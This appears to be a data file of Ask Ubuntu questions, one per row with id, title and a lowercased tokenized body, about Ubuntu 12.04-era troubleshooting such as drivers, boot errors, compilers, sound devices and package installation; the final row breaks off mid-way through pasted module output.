193528	how to enable fingerprint device for thinkpad t430s in 12.04 ?	i followed different tutorials to enable fingerprints reading , but without luck . fingerprint gui keeps saying no device found . any help on this ? = edit following first answer = i followed the tutorial you posted to install the fingerprint the result of lsusb is : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 001 device 003 : id 17ef:1003 lenovo integrated smart card reader bus 001 device 004 : id 147e:2020 upek bus 001 device 005 : id 04f2 : b2da chicony electronics co. , ltd bus 003 device 003 : id 04f2:0760 chicony electronics co. , ltd acer ku-0760 keyboard bus 003 device 004 : id 046d : c517 logitech , inc. lx710 cordless desktop laser so it does n't seem that my reader is supported ... am i right ?
193529	how to swap between fn and ctrl keys ?	i have a think pad at work and the keyboard is really killing me ( the left ctrl is not on the most left and it has the fn key there ) . i use a lot of ctrl + c , ctrl + v while writing code and this fn key annoys me ( i keep pressing it instead of ctrl ) . anyway , how to make the fn key the ctrl key ?
193534	i ca n't boot into ubuntu _ can not find grldr in all devices	i recently installed ubuntu 12.04 alongside windows 7 . it was working fine but now when i try to boot with ubuntu after the operationg system choice screen i get this try ( hd0,0 ) : ntfs5 : no wubildr try ( hd0,1 ) : extended : try ( hd0,2 ) : invalid or null try ( hd0,3 ) : invalid or null try ( hd0,4 ) : ntfs5 : no wubildr try ( hd0,5 ) : extended : try ( hd0,5 ) : ntfs5 : no wubildr try ( hd0,6 ) : extended : try ( hd0,5 ) : fat32 : no wubildr try ( fd0 ) : invalid or null error : can not find grldr in all devices . press ctrl+alt+del to reastart ... and when i press ctrl+alt+del it restarts the computer and if i chose to boot with ubuntu same thing happens again . but windows works fine.. how do i resolve this problem ? thanks .
193536	crt as 2nd monitor goes screwy after start up ?	new install of 12.04 on an old dell with a radeon ati rv516 video card with monitor out and s-video out . during boot up all is good . both screens operate and look fine . then just before the desktop appears , the crt goes purple and is converted into heavy horizontal lines , but as i said during boot up it was fine and the resolution was fine . the main monitor , an lcd , operates normally . everything else works fine , it 's just the picture on the crt that is screwed up . i used the same monitor and crt running 11.10 which worked fine any help would be appreciated and yes i am a newbie to ubuntu here is a vid showing the completely normal screens at reboot then the purple badness when the desktop loads ? ? and do n't laugh at the slow machine , it 's old . http : //www.youtube.com/my_videos_edit ? ns=1 & video_id=zfuh6lbmlnc crt is a toshiba 32mw7db , s-video is a direct input . my xrandr data has no data in the second column for the s-video ( apologies for not knowing how to present the data as it appears in the terminal window ) dvi-0 disconnected ( normal left inverted right x axis y axis ) s-video connected 1024x768+1680+282 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 59.9* 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 dvi-1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 473mm x 296mm 1680x1050 59.9*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1
193539	having 2 versions of gcc	i have just installed gcc 4.7 from ppa repository . ubuntu 12.04 already comes with 4.6 . when i use command : gcc -- version it tells me it is 4.6.3 to be exact . i have no idea of how to launch the 4.7 compiler . in fact , i would n't mind erasing the former version and stay with 4.7 only ( i guess that would n't be a problem ) . how can i fix this ?
193542	remove kile and other kde dependencies	i am using ubuntu 12.04 . i found my root directory full so thought to free up some space . in this regard i opt for removing kile . but the base package kile is only 4.4 mb . how can i remove its related libraries ( nearly 300mb ) which were installed with it ?
193545	extremely slow transfer speed ubuntu - > windows	i have two laptops , one is running ubuntu 12.04 ( ext4 ) the other is running windows 7 ( ntfs ) . i am copying over 40gb of data ( one file ) from the ubuntu laptop to the windows laptop . ( browse the shared folder on ubuntu using windows copy/paste ) but i am getting transfer speeds topping out at ~700kb/s surely this is not right . i am transferring via wifi on both laptops . my download speeds can reach 7-8mb/s on both laptops , so i know it is not the wifi cards or the router topping out . wlan0 link encap : ethernet hwaddr 84:4b : f5 : db : b4:85 inet addr:192.168.1.66 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :864b : f5ff : fedb : b485/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11941185 errors:0 dropped:0 overruns:0 frame:0 tx packets:11306693 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10087111370 ( 10.0 gb ) tx bytes:7843524888 ( 7.8 gb )
193560	symmetric multi processing	in a symmetric multiprocessing ( smp ) environment , multiple processors share other hardware resources , such as memory or storage . they have a single operating system . how to install or configure symmetric multiprocessing in linux .
193569	is there a way to store the current desktop layout ?	what i want to be able to save the current positions of my applications , so when i 'm going to open the same ones and run something they will rearrange as they were . for example if i 'm going to open a sublime and three terminal windows i would like to be able to save that somehow . i do n't care if it 's an app or a command line tool , as long as i can easily save the positions of my apps . i 'm a big fan of moom , but unfortunately it works only on macos and i really miss it when on ubuntu . it supports more features and if you know something close to it on top of my main problem that 's also fine .
193570	linux bridge ( brctl ) does n't forward ip-packets when router is one of the bridge endpoints	i have set up a brctl bridge on ubuntu with the following deployment : cisco router - > linux bridge - > client computer the bridge forwards the following packets types : arp , stp , but does n't forward ip ( i see that it get ippackets in eth0 but dosnt forward to eth1 ) trying brctl br0 stp off ( and on ) does n't help . trying to activate both ethernet cards with promisc mode does n't help either . set edge to 0 ( and set max edge to 0 ) does n't help either . ebtables dosnt install on the bridge computer , so this is not problem of ebtables filtering . when replace the router with simple computer that simulate simple tcp request the bridge forward the ip packets , so i suspect stp . bridge was set like this : iptables -x iptables -f ifconfig eth0 0.0.0.0 up ifconfig eth1 0.0.0.0 up brctl addbr br0 brctl addif br0 eth0 eth1 ifconfig br0 up
193575	sound works but no device shown in the sound settings	following a troubleshooting post i 've found out that my driver is recognized in fact but is not listed at the sound settings and i think because of this my cinnamon sound applet will not appear . altough my device does not appear in the sound settings i get sounds ( for example youtube and skype is working ) but i can not increase/decrease the volume ... i tried enabling login with root , login-logout and then login with user , restarts , following other ideas saying to fix this but still no sound devices listed ... still it works ( browser , skype ... ) , alsamixer works . any idea on how to fix this ? lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) subsystem : acer incorporated [ ali ] device 0205 flags : bus master , fast devsel , latency 0 , irq 46 memory at f4700000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel lsmod | grep snd snd_hda_codec_hdmi 31731 1 snd_hda_codec_realtek 63371 1 snd_hda_intel 32621 0 snd_hda_codec 115893 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80845 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq snd 62064 10 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm also ... in cinnamon the sound applet is not displayed in unity it displays as if it were muted . similar question : ubuntu 12.04 , can hear the sound but sound option in settings shows no sound card
193577	correct way to create a desktop entry file of directory type ?	what elements should i define in a desktop entry file of directory type for xfce ? although it can be created using thunar file manager by right clicking on the folder , so what i want to know is that if its possible to create one manually . i wish xfce was well documented as other des
193578	unable to install eclipse manually	i have just started linux . i have a sbc ( atom processor ) on which i have installed ubuntu 12.04 and now i am trying to install fortran ide . for which i have learnt that i need to install openjdk first , then eclipse juno and at last the phortran plugin for eclipse . i have no internet access so i had follow the below steps for manual installation . first download the eclipse tar.gz package ( downloaded : eclipse-parallel-juno-linux-gtk.tar ) . then right-click the eclipse tar.gz and choose the extract here option to extract the tar.gz package.you can also use the command line to extract the tar.gz package . # tar xzf eclipse-cpp-juno-linux-gtk.tar.gz move to /opt/ folder . # mv eclipse /opt/ use sudo if the above command gives permission denied message . # sudo mv eclipse /opt/ create a desktop file and place it into /usr/share/applications # sudo gedit /usr/share/applications/eclipse.desktop and copy the following to the eclipse.desktop file [ desktop entry ] name=eclipse type=application exec=/opt/eclipse/eclipse terminal=false icon=/opt/eclipse/icon.xpm comment=integrated development environment nodisplay=false categories=development ; ide name [ en ] =eclipse.desktop create a symlink in /usr/local/bin using # cd /usr/local/bin # sudo ln -s /opt/eclipse/eclipse now its the time to launch eclipse . # /opt/eclipse/eclipse -clean & now at step 5 , when i type the command sudo ln -s /opt/eclipse/eclipse , i get an this error message : ln : failed to create symbolic link './eclipse ' : file exists . please help me in resolving this .
193582	how do i install matlab via the iso ?	i am trying to install matlab r2010b to ubuntu 12.04 . i have the iso file . first i copied it to my pc and then extracted it . now it seems like i should run the install script . but i could not do that . here is the beginning of the install script to give you an opinion if it is not a script and i am doing something wrong : # ! /bin/sh # # name : # install - script file for invoking the multi-platform installer on linux . # # usage : install [ -h|help ] '' # [ -javadir < directory > ] | [ -root < directory > ] | '' # [ -test ] | [ -v|-verbose ] '' # -h|-help - display arguments . '' # -test - do n't actually run the java # command ( only useful with -v ) . '' # -v|-verbose - display settings . '' # -javadir < directory > - override default java root directory . '' # -root < directory > - override default dvd root directory . '' # # the default settings when no override inputs are supplied are : `` # -root = < directory containing this script > /../ '' # -javadir = < root > /java/jre/ $ arch/jre' # # # copyright 2009-2010 the mathworks , inc. how can i run this script ? i tried to rename it as install.sh and then tried $ ./install.sh from the command window but i got the following error : root @ ghostrider : /home/zero/downloads/r2010b_unix # ./install.sh preparing installation files ... installing ... ./install.sh : line 562 : /tmp/mathworks_7799/java/jre/glnx86/jre/bin/java : permission denied finished am i doing something wrong ? could you please help me ? regards
193586	searching in crontab	i 'm pretty new to ubuntu and cron , and i was wondering how to search for something in the crontab file . basiclly , the ubuntu equivilent of ctrl+f on windows . thanks
193590	graphical corruption of characters in file manager or terminal	i 'm using ubuntu 12.04 lts with graphic driver intel速 945g x86/mmx/sse2 . sometimes ( i think after using hibernation - not restarting system ) i 'm getting graphical issue with characters in file manager or terminal . i ca n't imagine what is the source of this problem . here is my desktop with graphical corruption , see text characters in browser is fine .
193611	connect to openvpn using username and password	is it possible to connect to an openvpn server using a username and password . i read that you need a config file on ubuntu , but i do n't have a config file . how can i connect to my openvpn server using credentials ?
193613	boot problem with upgrading from ubuntu 10.04 to 10.10	bonjour i have tried to upgrade from ubuntu 10.04 to 10.10 , i 've gotten an error : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages i executed command apt-get purge dpkg after this system is not booting but giving following message in the biginning init : hwclock main process ( 373 ) terminated with status 2 . :1 : ca n't open /etc/default/rcs init : mountall main process ( 376 ) terminated with status 2 filesystem check or mount failed a maintenenace shell will now be started . control-d will termiante this shell and continue booting after re-typing filesystems . any further errors will be ignored root @ ahmad-laptop : ~ # _ i hope you will have solution , please regards
193614	radeon hd 6290 terrible performance on a certified laptop	i bought asus k53u laptop , which is ubuntu certified with pre-installed 11.10 . the graphic card is radeon hd 6290 but 720p playback is terrible . even page scrolling in firefox is very laggy . proprietary drivers are installed by default . how is this possible , why is the laptop ubuntu certified if the performance is poor ? any solution to this ? i just did apt-get autoremove , and after that , this message came out in terminal : error inserting vesafb ( /lib/modules/3.0.0-15-generic/kernel/drivers/video/vesafb.ko ) : no such device could that be the problem ?
193616	why is the software center in the debian repositories ?	not that i mind or anything , just out of curiosity . but i noticed today that the software center in ubuntu is actually an upstream package ? . in the description it says to install or remove software using usc , you need administrator access on the computer . so , it is referred to ubuntu software center and the screen-shot on the right is taken from ubuntu . so , why would it be available in the debian repositories , what is its use there ?
193617	xournal bug while attempt to open file `` could not open background ''	i use xournal 0.4.5 for work with pdfs : adding comments , ticking , etc . i save files as pdf.xoj - standard xournal format . there was no any problems with opening it and editing again . my problem is that , yesterday i save one .xoj file [ everything as usual ] and now i ca n't open it because there is only message `` could not open background '' . i can open others files , but in the case of this one there is no such possibility . i am trying with preferences editing , ticking and unticking various options but there is still the same . maybe anyone have any idea how to fix it ?
193618	how can i publish addons on the ubuntu software center	i have a commercial app , and according to the faq on http : //developer.ubuntu.com , there is a way for me to publish add-ons as seen with many open source applications such as thunderbird mail . i am wondering how that is done . if anyone could point me in the right direction i 'd appreciate it .
193620	skype crashes when selecting photo for avatar	i have a problem with skype . when i try to set an avatar , it crashes when i click on a photo , through the selector . i 'm running skype 4.0.0.8 on 12.04 . is there anyway to fix this ?
193634	how will deja-dup 's performance vary with the type of the target ?	this is a follow-up to this question . i have the possibility to use rsync , ftp , cifs or ftp for my remote backups , provided i can get them to work with the duplicity command line , of course . will duplicity leverage any advantages of the protocol in use ? if so , which will perform best on big sets ( ~100 gb ) of data ?
193635	more helpful network error	in ubuntu , when my network fails to connect , it just says `` network not connected / disconnected '' , without providing any helpful error message . on the contrary , windows gives an error code plus a one or two line spanning error message that pinpoints what error occurred during a connection attempt . is there a way to get such a detailed error report on ubuntu , either via gui or via terminal ? thank you .
193646	can not log in to ubuntu after changing /etc/fstab	i was recently trying to change my /home directory to a new hard drive using these instructions . i got to the step where i have to change the fstab file and i think what i did was i set the location to /home instead of /media/home . well now when i try to log into my computer , it brings me back to the log in page , but it does n't say that my password was wrong , so i know that 's not the problem . i 've been trying to do the ctrl+alt+f2 thing to edit the fstab file from the command line , but its a read-only file . i also tried changing the permissions of the file with chmod , but that does n't work either . what else can i do to solve this ?
193652	ubuntu 12.04 lts on virtualbox 4.1.18 reverts to last snapshot	somehow , my ubuntu 12.04 lts running in virtualbox 4.1.18 ( w7 host ) got stuck.. and i closed the machine . now when i start up the vm again , it reverts back to my last snapshot which is more than 20 days old . fortunately i have a quite recent backup of my important data , but still , this is very annoying.. what could the problem be and is there a way to get my data back ?
193655	connecting ubuntu 11.10 to samsung lcd tv over hdmi , gives screen in green and lila	i have a dell 5720 laptop with ubuntu 11.10 . i ca n't connect to my samsung lcd tv ( over marantz nr 1601 av ) . audio is ok but the pictures are displayed in two colours : green and lila ! please send me a massage how can i fix this problem ! thanks a lot . i am very confused because i do not do anything however it comes ( seldom ) to the right colouring but only for a while ( 5minutes ) and returns to the green-lila picture again when i do something else for example surfing with firefox or starting other programs ! the settings : resolutions of laptopscreenplay and tv are the same and i did not change the colour profile as well . my laptop screen is hd+ truebright ( 1600x900 ) and my tv samsung 1280x720 i have no idea what to do my hdmi connection to make right with the colours ! how can i fix this situation to gain a stable colouring ?
193657	adding a library to java classpath	i am not sure if my question is more related about ubuntu or java , so pardon me ! i am trying to compile a java program but i get the following error : package javax.comm does not exist i have downloaded the required package comm.jar but i do not know how/where should i install/copy this file . i read somewhere that this should be in classpath folder but i dont have this folder . this is what i get for java -version i guess this means i have already installed java in my system : java version `` 1.6.0_24 '' openjdk runtime environment ( icedtea6 1.11.4 ) ( 6b24-1.11.4-1ubuntu0.12.04.1 ) openjdk server vm ( build 20.0-b12 , mixed mode ) i also have these folders in /usr/lib/jvm/ : default-java java-1.7.0-openjdk-i386 java-6-openjdk-i386 java-1.6.0-openjdk java-6-openjdk java-7-openjdk-common java-1.6.0-openjdk-i386 java-6-openjdk-common java-7-openjdk-i386
193660	making customized distro of ubuntu server ( minimal )	i 've made an ubuntu installation from minimal with no x - everything is based on cli and added some apps to it . i 've custom designed it so it can be like a lan-based web server and serve the apps/data as necessary . i 'm now trying to make a distro of this setup and tried with remastersys . while the process completed ok and he livecd works well , the install option does nothing more than booting it in livecd mode . one of the lines i see while remastersys is in the process , installing the ubiquity gtk frontend grep : /etc/x11/default-display-manager : no such file or directory i even tried removing remastersys followed by a reinstall with no luck . `` bing*ed* '' around for some help and cam across some interesting stuff which says ubuntu does not have cli based install process so it 's not remastersys 's fault . some suggestion was that i install ubiquity-frontend-debconf before installing remastersys . i even tried this but no luck . i do not need any graphical installer and there 's no options to choose from at the time of install . i do n't understand why they say ubuntu can only install with a graphical installer , when ubuntu server minimal edition does not seem to use a graphical installer ( correct me if i 'm wrong , pls ) how would i be able to go about with this , pls ?
193662	net connection using cdma wll bsnl phone	please help me in connecting the wll cdma bsnl phone in edubuntu software supplied by it @ school the model name of wll cdma connection is huawei fp2255 the hints * when the device is connected by usb cable to lap a link is shown in mobile brandband ( see the attached photos ) *when i searched in google hemanathan 's blog and some others lead me to write the programme in `` terminal '' but i cant do it suggest simple ways >
193663	what components are needed for mysql workbench ?	i have read this au q & a titled : mysql workbench for ubuntu 12.04 lts [ duplicate ] and installed mysql-workbench-gpl-5.2.43-1ubu1204-i386.deb . when setting up a connection to the mysql running on localhost or remotely , i get this error : connecting to mysql server localhost ... can not start ssh tunnel manager i 'm not sure what else to install . btw , with almost no effort mysql navigator works just fine to the same systems . my system is : linux steamboy 3.2.0-31-generic-pae # 50-ubuntu smp fri sep 7 16:39:45 utc 2012 i686 i686 i386 gnu/linux and i grabbed the 32-bit workbench . i 'm running 12.04 with all current updates .
193664	fix incompatibilities libreoffice files opened in ms office 2007	i 've just installed ubuntu for a few days in dual-mode with win7 . in ubuntu , i opened some ms office 2007 files and wrote reports . after i enter win7 again and open these reports , they all crashed and can not be displayed or many slides were missing , became blank i had saved all files in office formats already . the fact is they still crash . is there any way that i can have my reports back ? thanks a lot in advance ! !
193667	sshfs mounts with user privileges but for umount i need root . why ? how ?	i 'm trying to unmount from nautilus , the directory created by sshfs , but i get this error : unable to unmount dir umount : /home/user/dir is not in the fstab ( and you are not root ) i 'm not getting why is this happening . how can i unmount sshfs without sudo ? any enlightenment will be appreciated . thanks in advance ,
193669	ubuntuone : what happen if i delete my folder	i started using ubuntuone and i must admit that i am fairly new to this file sharing concept ... so i was wondering , what would happen if my folder containing all of my files were deleted on my computer ( like , with a format ... ) . would i lose these files or could i recreate the folder after the format and get back my files ? thanks !
193670	symbolic link : no such file or directory	i created a symbolic link from a file at `` /opt/bladir/bla '' to `` bla '' . so `` bla '' is now in `` /usr/bin/bla '' . but if i want to call `` bla '' at terminal , there comes the no such file or directory error . i looked up at `` /usr/bin/bla '' and the file is linking correctly at `` /opt/bladir/bla '' . what can be the error ? p.s . here is my terminal `` entry '' : sudo ln -s /opt/bladir/bla bla thanks ! âź : problem solved . according to the feature list , 12.04 should have multiarch support ... 'should ' . i got the ia32-libs from synaptic and now the program wents just fine . as it looks , my symbolic links where correct . thank you for all the answers !
193674	how do i get an airtel dongle working ?	how do i make airtel dongle work in ubuntu ?
193676	updated this morning lost monitor	updated 12.04 this morning and lost monitor with vga connection . using laptop for this email . have tried to reinstall from cd 4 times now but still nothing . older tower has suse on it ca n't even see that . love ubuntu but good grief . help please . have found some information on what to put in the sudo but ca n't see anything how do i get back ? also planning on upgrading video card so can run hdmi to big screen any suggestions on that ?
193679	ca n't unset window shortcut	i somehow set konsole to activate an open instance using ctrl+shift+t which also happens to be browsers default re-open closed tab shortcut . i want to unset this window shortcut on console but i can not figure out how to do so . i 've looked through the special window settings , special application settings and could not find anything there . i can temporarily unset the shortcut , listed as `` activate window ( wallpapers : bash { ctrl+shift+t } ) '' , in the global shortcuts but when i restart my computer it will return . i even tried resetting all the global keybindings to default but that did not stick either . running : kubuntu 12.04.1 kde 4.8.5 edit : i 've turned off the `` new tab '' shortcut , it does not help : here 's the option i have to disable to get ctrl+shift+t to stop overriding my browser , however , it resets every time i reboot .
193682	accents - nano editor	i am using nano as my everyday text editor . i 'm using an old laptop , so nano it 's fast , lightweight , and saves me battery . the only problem is the fact i ca n't use special characters and accents . for example , as i am from brazil , i need to use some everyday-accentued-portuguese-characters : à , á , ç , ç , ó , ô , õ , ã , â ... is there any way i can enable it ? to make õ be printed if '~ ' + 'o ' is pressed , or ü if '¨ ' + 'u ' is pressed ... thank you : )
193684	which ubuntu to use for dell n5110	i have dell n5110 laptop . it has 6gb of ram , i5-2450m processor and geforce gt525m graphic card . i wanted to ask , which version of ubuntu would be best suited for this laptop ? i installed 12.04 but the battery is n't lasting as long as it is on windows 7 . and also the fan is noisier than on windows . but the cpu temperature is sligtly higher than on windows . on windows ~ 52 - 55 degrees celsius . on ubuntu 12.04 ~ 59 - 65 degrees celsius . which version would you recoment to change to ?
193689	wine application runs from generated launcher , but not from console	i have installed a windows application through wine , and it launches perfectly through the generated launcher , however , when i use the exact same commands the launcher uses , but to invoke the program from the console , i just get errors and warnings but no application . is there something i 'm missing here ? do i have to specify the output to be to something else besides the console ? update i apologize for the lack of information given in my original post . here some extra info that might help better understanding the problem . this is the actual command i 'm using to invoke the program from the console , it 's the exact same command the launcher uses to successfully start the program . env wineprefix= '' /home/carmen/.wine '' wine c : \\program\ files\ \ ( x86\ ) \\gamenext\\the\ rise\ of\ atlantis\\the_rise_of_atlantis.exe these are the errors i get using the above command . fixme : d3d : check_fbo_compat format wined3dfmt_r10g10b10a2_unorm with rendertarget flag is not supported as fbo color attachment , and no fallback specified . fixme : d3d : check_fbo_compat format wined3dfmt_b10g10r10a2_unorm with rendertarget flag is not supported as fbo color attachment , and no fallback specified . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x32f880,0x00000000 ) , stub ! thanks again in advance everyone .
193695	installing packages into local directory ?	i 'd like to install software packages , similar to apt-get install < foo > but : without sudo , and into a local directory the purpose of this exercise is to isolate independent builds in my continuous integration server . i do n't mind compiling from source , if that 's what it takes , but obviously i 'd prefer the simplest approach possible . i tried apt-get source -- compile < foo > as mentioned here but i ca n't get it working for packages like autoconf . i get the following error : dpkg-checkbuilddeps : unmet build dependencies : help2man i 've got help2man compiled in a local directory , but i do n't know how to inform apt-get of that . any ideas ? update : i found an answer that almost works at http : //askubuntu.com/a/350/23678 . the problem with chroot is that it requires sudo . the problem with apt-get source is that i do n't know how to resolve dependencies . i must say , chroot looks very appealing . is there an equivalent command that does n't require sudo ?
193696	wubi installer is taking ages to download	i am downloading ubuntu 12.04 -- wubi installer but for reasons unknown , it is taking ages to download . i have no choice but to abort it . fyi , i have installed wubi before but have uninstalled it not long ago . appreciate your help . thanks .
193701	what should i use ubuntu for ?	i need some of your precious advice co-ubuntu users . i have been a full ubuntu user for a few months now and our old 2005 model pc just broke down and so my parents gave me a new pc ( notebook ) . i have installed windows 7 ultimate for some reason . now , my problem is that , since i am a amateur graphic designer , website developer , software developer and other professions a normal teenager wo n't try and i am using adobe creative suite cs6 master collection for my multimedia creation and web development needs , what could i use ubuntu linux for ? software development ? website usability testing ? other multimedia stuff ? etc. ? need real help because my mind is getting confused in what should i use ubuntu for ... any help will be welcomed with appreciation . : d p.s . do n't suggest to me any games because i 'm no gamer .
193719	howto have thunderbird/lightning open ics files	some websites offer .ics files , calendar files . i would like thunderbird to open these with lightning so it can add the events in the ics-file to its calendar . when i use /usr/bin/thunderbird to open the file with , it starts a new message with the ics file attached . i could download the file , then import it from lightning , but i rather have lightning just open the file . is there a commandline-option for this ? some wrapper-script maybe ? should i change something in firefox ?
193721	how to change minimize button icon ?	there are discussions on minimize button icon recently : since the launcher is on the left where minimized window goes , should ubuntu minimize button be vertical ? there are many different suggestions , such as a dot , an arrow , etc. , but i think a single left-pointing arrow is the best . whether this is right or not , how to change minimize button to a left-pointing arrow ?
193730	ubuntu for internet radio	i am planning to set up a streaming server purely for internet radio using icecast2 . what software packages do i require during ubuntu installation and any third party apps i may require . i am going to use butt ( broadcast using this tool ) encoder and would like to be able to run butt on any computer so that other people can broadcast to my server from anywhere . i am looking for tips or tutorials on how to achieve the above . i mainly need info on cofiguring ubuntu server and icecast2 . also gui ? if so what one . preferablly lightweight . i am choosing ubuntu for its level of security and reliability . i hope someone can help me as i plan to make this a community radio station . many thanks khz
193733	erased gcc4.6 ... should n't have	so ... after isntalling gcc4.7 , i found i had gcc4.5 , 4.6 and 4.7 . after configuring alternatives , when typing gcc -- version it said it was 4.7 , but i was not sure that qtcreator were using the right one , so i decided to erase 4.5 and 4.6 . and ... i should n't have done that . now , even when i reinstalled 4.6 with aptitude , gcc command is not found ( /usr/bin/gcc : no such file or directoy ) . i need to fix this or i ca n't continue working . i 'm only interested in having 4.7 . any help ?
193736	print to thermal printer from open office calc	i 'd like to print receipts to an epson tm-t88iv from open office calc ( spreadsheet ) . is this possible ?
193737	how to listen radio from terminal ?	i am using ubuntu 12.04 . while seeing around here i have gone through this but it didnt seems to be work with me . here is my trail . raja @ badfox : ~ $ mplayer www.live365.com mplayer svn r34540 ( ubuntu ) , built with gcc-4.6 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing www.live365.com . file not found : 'www.live365.com' failed to open www.live365.com . exiting ... ( end of file ) its looks like some background work needed .
193739	error while installing nvidia driver	i 'm trying to install the latest ( as of 27/09/2012 ) nvidia drivers for my gtx 660 through the additional drivers tab in system settings . it ends up aborting , producing a log that says something about xorgdriverhandler not being installed . what do i do to fix it ? i 've tried to reinstall it by purging it but to no avail .
193740	does changing in `lsb-release` file affects upgrades ?	i have ubuntu and edubuntu installed on my laptop . but both shows as `` ubuntu ... '' in the grub menu . to workaround this , i can change the variable distrib_id and distrib_description to have values `` edubuntu '' instead of `` ubuntu '' and then run sudo update-grub . but , i wonder whether that can affect my future upgrades . for example , if i want to upgrade to a latest release , will that upgrade be done as an `` ubuntu '' system or `` edubuntu '' system ?
193752	how do i force the system to look for new sound devices ?	i have a small flat screen tv ( toshiba ) that i often connect via hdmi to my laptop ( an hp pavilion dv4 ) and use as a computer monitor . when i do this , i prefer to use the tv 's speakers , particularly when i 'm watching video , because the sound quality is much better . however , when i connect the hdmi cable after turning on my computer ( rather than having it plugged in before booting up ) , sound settings does not list the tv as an output device , and i am forced to reboot . i was curious if there is an easier solution to this , perhaps a cli command to check for new sound outputs . does anyone know of something like this or have another solution ? to clarify , i believe this is a software problem . the hdmi always works , and i can switch my desktop over to the tv at any time . the issue is that , if the hdmi was n't connected during start up , the tv will not appear as an output option in the sound settings gui . so , unless i 'm mistaken , my question is not hdmi specific , but rather a general usage question about manipulating sound settings from the command line . output of 'cat /proc/asound/cards ' : 0 [ intel ] : hda-intel - hda intel hda intel at 0xda500000 irq 48 update : here 's some of the outputs requested . sorry for the delay . output of 'lsmod ' ( after booting up the computer , connecting the hdmi , and successfully setting the hdmi-connected screen as the sole monitor . however , hdmi is not listed as an option in the sound settings gui ) : module size used by usbhid 47199 0 hid 99559 1 usbhid michael_mic 12612 0 arc4 12529 0 pci_stub 12622 1 vboxpci 23200 0 vboxnetadp 13382 0 vboxnetflt 23441 0 vboxdrv 287082 3 vboxpci , vboxnetadp , vboxnetflt bnep 18281 2 parport_pc 32866 0 rfcomm 47604 0 ppdev 17113 0 bluetooth 180104 10 bnep , rfcomm binfmt_misc 17540 1 snd_hda_codec_hdmi 32474 1 snd_hda_codec_idt 70795 1 snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi i915 473298 2 snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq lib80211_crypt_tkip 17390 0 ir_lirc_codec 12859 0 lirc_dev 19204 1 ir_lirc_codec wl 2568210 0 uvcvideo 72627 0 ir_mce_kbd_decoder 12777 0 snd 78855 16 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device ir_sony_decoder 12510 0 videodev 98259 1 uvcvideo soundcore 15091 1 snd ir_jvc_decoder 12507 0 psmouse 97443 0 ir_rc6_decoder 12507 0 joydev 17693 0 snd_page_alloc 18529 2 snd_hda_intel , snd_pcm lib80211 14381 2 lib80211_crypt_tkip , wl hp_wmi 18092 0 v4l2_compat_ioctl32 17128 1 videodev sparse_keymap 13890 1 hp_wmi serio_raw 13211 0 drm_kms_helper 46978 1 i915 hp_accel 25976 0 ir_rc5_decoder 12507 0 drm 241921 3 i915 , drm_kms_helper jmb38x_ms 17646 0 i2c_algo_bit 13423 1 i915 wmi 19256 1 hp_wmi memstick 16569 1 jmb38x_ms lis3lv02d 19876 1 hp_accel ir_nec_decoder 12507 0 video 19596 1 i915 input_polldev 13896 1 lis3lv02d rc_rc6_mce 12502 0 coretemp 13525 0 ene_ir 18457 0 rc_core 26412 10 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , ir_nec_decoder , rc_rc6_mce , ene_ir mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp sdhci_pci 18826 0 sdhci 33205 1 sdhci_pci r8169 62099 0 output of 'lsmod ' ( after only restarting the computer . hdmi output is now appears in sound settings ) : module size used by pci_stub 12622 1 vboxpci 23200 0 vboxnetadp 13382 0 vboxnetflt 23441 0 vboxdrv 287082 3 vboxpci , 